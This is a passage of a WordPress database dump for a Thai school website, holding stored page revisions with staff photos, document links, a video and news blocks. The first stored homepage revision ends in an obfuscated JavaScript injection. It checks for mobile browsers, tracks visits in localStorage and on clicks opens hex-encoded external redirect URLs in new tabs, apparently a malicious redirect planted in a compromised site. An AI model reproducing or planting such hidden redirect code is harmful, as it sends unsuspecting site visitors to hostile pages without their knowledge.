Item\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:05:30','2024-09-24 04:05:30','',19,'http://watprato.ssk.in.th/?p=417',0,'revision','',0),
(418,2,'2024-09-24 11:17:35','2024-09-24 04:17:35','','e24fdb867221495643d16cf69a56df03','','inherit','open','closed','','e24fdb867221495643d16cf69a56df03','','','2024-09-24 11:17:35','2024-09-24 04:17:35','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg',0,'attachment','image/jpeg',0),
(420,2,'2024-09-24 11:20:48','2024-09-24 04:20:48','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":418,\"width\":\"222px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" 